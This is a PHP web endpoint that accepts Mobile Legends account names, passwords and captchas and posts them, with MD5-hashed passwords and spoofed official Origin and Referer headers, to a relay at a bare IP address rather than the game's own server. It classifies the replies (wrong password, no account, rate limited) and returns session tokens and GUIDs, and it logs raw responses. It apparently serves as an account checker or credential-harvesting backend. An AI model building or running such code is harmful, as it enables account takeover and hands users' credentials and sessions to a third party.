<?php
header('Content-Type: application/json');
header('Access-Control-Allow-Origin: *');
header('Access-Control-Allow-Methods: POST');
header('Access-Control-Allow-Headers: Content-Type');

// Only allow POST requests
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    http_response_code(405);
    echo json_encode(['success' => false, 'message' => 'Method not allowed']);
    exit;
}

// Get JSON input
$input = json_decode(file_get_contents('php://input'), true);

if (!$input) {
    echo json_encode(['success' => false, 'message' => 'Invalid JSON input']);
    exit;
}

// Validate required fields
$account = $input['account'] ?? '';
$password = $input['password'] ?? '';
$e_captcha = $input['e_captcha'] ?? '';

if (empty($account) || empty($password) || empty($e_captcha)) {
    echo json_encode(['success' => false, 'message' => 'Missing required fields']);
    exit;
}

/**
 * Generic cURL function
 */
function makeCurlRequest($url, $payload = null, $headers = [], $isPost = true) {
    $ch = curl_init();
    
    $defaultHeaders = [
        "Content-Type: application/json",
        "User-Agent: Mozilla/5.0 (Linux; Android 14; SM-G973F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.165 Mobile Safari/537.36",
        "Accept: */*"
    ];
    
    $headers = array_merge($defaultHeaders, $headers);
    
    curl_setopt_array($ch, [
        CURLOPT_URL => $url,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_TIMEOUT => 30,
        CURLOPT_SSL_VERIFYPEER => true,
        CURLOPT_FOLLOWLOCATION => true,
        CURLOPT_HTTPHEADER => $headers
    ]);
    
    if ($isPost) {
        curl_setopt($ch, CURLOPT_POST, true);
        if ($payload) {
            curl_setopt($ch, CURLOPT_POSTFIELDS, is_array($payload) ? json_encode($payload) : $payload);
        }
    }
    
    $response = curl_exec($ch);
    $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    $curlError = curl_error($ch);
    
    curl_close($ch);
    
    if ($curlError) {
        throw new Exception("cURL Error: " . $curlError);
    }
    
    if ($httpCode !== 200) {
        throw new Exception("HTTP Error: " . $httpCode);
    }
    
    return $response;
}


/**
 * Login to MLBB account and get session
 */
function loginAndGetSession($account, $password, $e_captcha) {
    try {
        // Create MD5 hash of password
        $md5pwd = md5($password);
        
        // Create raw string for signature
        $raw = "account={$account}&e_captcha={$e_captcha}&md5pwd={$md5pwd}&op=login";
        
        // Create signature
        $sign = md5($raw);
        
        // Prepare headers
        $headers = [
            "Content-Type: application/json",
            "User-Agent: Mozilla/5.0 (Linux; Android 14; SM-G973F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.165 Mobile Safari/537.36",
            "Accept: */*",
            "Origin: https://mtacc.mobilelegends.com",
            "Referer: https://mtacc.mobilelegends.com/"
        ];
        
        // Prepare payload
        $payload = [
            "lang" => "en",
            "op" => "login", 
            "sign" => $sign,
            "params" => [
                "account" => $account,
                "md5pwd" => $md5pwd,
                "e_captcha" => $e_captcha
            ]
        ];
        
        // Execute login request via Node API
        $response = makeCurlRequest("http://129.212.226.194:5555/api/mlbb-request", $payload, $headers, true);
        
        // Parse response
        $data = json_decode($response, true);
        
        if (!$data) {
            throw new Exception("Invalid JSON response");
        }
        
        // Log the raw response for debugging
        error_log("MLBB API Response: " . $response);
        
        // Check if response is wrapped in 'result' (from Node API)
        if (isset($data['success']) && isset($data['result'])) {
            // Response from Node API - extract the result
            $apiData = $data['result'];
            $message = $apiData['message'] ?? 'No message';
            $code = $apiData['code'] ?? -1;
        } else {
            // Direct response
            $message = $data['message'] ?? 'No message';
            $code = $data['code'] ?? -1;
            $apiData = $data;
        }
        
        // Handle different response messages
        switch ($message) {
            case "Error_PasswdError":
                return [
                    'success' => false,
                    'message' => 'Error_PasswdError',
                    'display_message' => 'Wrong password',
                    'account' => $account
                ];
                
            case "Error_FailedTooMuch":
                return [
                    'success' => false,
                    'message' => 'Error_FailedTooMuch',
                    'display_message' => 'Rate limited - too many failed attempts',
                    'account' => $account
                ];
                
            case "Error_NoAccount":
                return [
                    'success' => false,
                    'message' => 'Error_NoAccount',
                    'display_message' => 'Account not found',
                    'account' => $account
                ];
                
            case "Error_CaptchaError":
                return [
                    'success' => false,
                    'message' => 'Error_CaptchaError',
                    'display_message' => 'Captcha verification failed',
                    'account' => $account
                ];
        }
        
        // Check for successful login
        if ($code === 0 || $message === 'Error_Success') {
            $session = $apiData['session'] ?? null;
            $guid = $apiData['guid'] ?? null;
            
            if ($session && $guid) {
                return [
                    'success' => true,
                    'message' => 'Login successful',
                    'session' => $session,
                    'guid' => $guid,
                    'account' => $account,
                    'full_response' => $apiData
                ];
            }
        }
        
        // Default error response
        return [
            'success' => false,
            'message' => $message,
            'display_message' => 'Login failed: ' . $message,
            'account' => $account,
            'code' => $code,
            'full_response' => $apiData
        ];
        
    } catch (Exception $e) {
        error_log("MLBB Login Error: " . $e->getMessage());
        return [
            'success' => false,
            'message' => 'Connection error',
            'display_message' => 'Failed to connect to MLBB servers',
            'error' => $e->getMessage()
        ];
    }
}

// Perform login
$result = loginAndGetSession($account, $password, $e_captcha);

// Log the attempt for monitoring
$logData = [
    'timestamp' => date('Y-m-d H:i:s'),
    'account' => $account,
    'success' => $result['success'],
    'message' => $result['message'],
    'ip' => $_SERVER['REMOTE_ADDR'] ?? 'unknown'
];

error_log("MLBB Login Attempt: " . json_encode($logData));

// Return response
echo json_encode($result);
?>